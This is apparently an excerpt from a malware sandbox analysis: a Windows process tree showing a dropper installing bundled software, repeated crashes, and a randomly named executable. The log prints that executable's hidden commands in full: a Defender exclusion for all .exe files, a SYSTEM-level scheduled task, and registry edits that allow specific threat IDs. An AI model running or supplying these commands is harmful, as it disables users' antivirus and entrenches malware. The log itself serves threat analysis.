C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4044 --field-trial-handle=2888,i,1505237577704582794,4382369224944289541,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:110⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"9⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3520 --field-trial-handle=2812,i,8749040385625566762,16448139243447875464,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4156 --field-trial-handle=2812,i,8749040385625566762,16448139243447875464,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\uSyXFTmG\wS6Kva1R.exeC:\Users\Admin\AppData\Local\Temp\uSyXFTmG\wS6Kva1R.exe --silent --allusers=04⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS817E95F9\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS817E95F9\setup.exe --silent --allusers=0 --server-tracking-blob=MTIzNjVhZGI2Y2Q5OTAxNWFiZDc3Njg2MzdhMmFlNjdjNTEzOWIyMDlhNjA3ODFiZGY4ZjEyNzRkZjE0ZGE0ZDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MTk3NTAwMTIuOTIzMiIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiNGM0NGY3NDUtYTc2MS00ZWZmLWEyMDgtMmI0ZjFkMzkxNDZhIn0=5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\7zS817E95F9\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS817E95F9\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.43 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x6deda128,0x6deda134,0x6deda1406⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\7zS817E95F9\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zS817E95F9\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2648 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240630122032" --session-guid=2c8863fd-aa99-4047-b13c-c08bb57e5032 --server-tracking-blob=OGY5ZjNiMWM3NmE0NGFmNjljY2FhMmNhMjFjYWNmYTYwMTJkZWU1YTVmYTdmMTE4ODE0Njk3OGE0Y2JkY2IxMjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxOTc1MDAxMi45MjMyIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiI0YzQ0Zjc0NS1hNzYxLTRlZmYtYTIwOC0yYjRmMWQzOTE0NmEifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=6C060000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\AppData\Local\Temp\7zS817E95F9\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS817E95F9\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.43 --initial-client-data=0x338,0x33c,0x340,0x308,0x344,0x7259a128,0x7259a134,0x7259a1407⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406301220321\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406301220321\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406301220321\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406301220321\assistant\assistant_installer.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406301220321\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406301220321\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x2f9f88,0x2f9f94,0x2f9fa07⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fNT63P1i\Db6zB8aLoGggRqEiWYIG.exeC:\Users\Admin\AppData\Local\Temp\fNT63P1i\Db6zB8aLoGggRqEiWYIG.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-8VTRP.tmp\Db6zB8aLoGggRqEiWYIG.tmp"C:\Users\Admin\AppData\Local\Temp\is-8VTRP.tmp\Db6zB8aLoGggRqEiWYIG.tmp" /SL5="$304F4,5110441,54272,C:\Users\Admin\AppData\Local\Temp\fNT63P1i\Db6zB8aLoGggRqEiWYIG.exe"5⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Morphology VIXEN Junior\morphologyvixenjunior.exe"C:\Users\Admin\AppData\Local\Morphology VIXEN Junior\morphologyvixenjunior.exe" -i6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Morphology VIXEN Junior\morphologyvixenjunior.exe"C:\Users\Admin\AppData\Local\Morphology VIXEN Junior\morphologyvixenjunior.exe" -s6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 23204⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 23524⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\fsrQhCPI\uOkjnwLtxqvp81ZenxK.exeC:\Users\Admin\AppData\Local\Temp\fsrQhCPI\uOkjnwLtxqvp81ZenxK.exe /did=757674 /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bSqDvJefqHHToWFkhX" /SC once /ST 12:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\fsrQhCPI\uOkjnwLtxqvp81ZenxK.exe\" 8O /dmdidGd 757674 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 11805⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 21844⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 23524⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 23004⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 20324⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 23164⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 20324⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 23044⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 18764⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 23364⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 19804⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 20844⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 13884⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 22684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 18324⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 22684⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 22324⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 23364⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 19964⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 20364⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 20764⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 23844⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 20164⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 12644⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 11204⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 17044⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 18844⤵
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2892 -ip 28921⤵
-
C:\Users\Admin\Documents\7z1900.exe"C:\Users\Admin\Documents\7z1900.exe"1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2892 -ip 28921⤵
-
C:\Users\Admin\AppData\Local\Temp\fsrQhCPI\uOkjnwLtxqvp81ZenxK.exeC:\Users\Admin\AppData\Local\Temp\fsrQhCPI\uOkjnwLtxqvp81ZenxK.exe 8O /dmdidGd 757674 /S1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 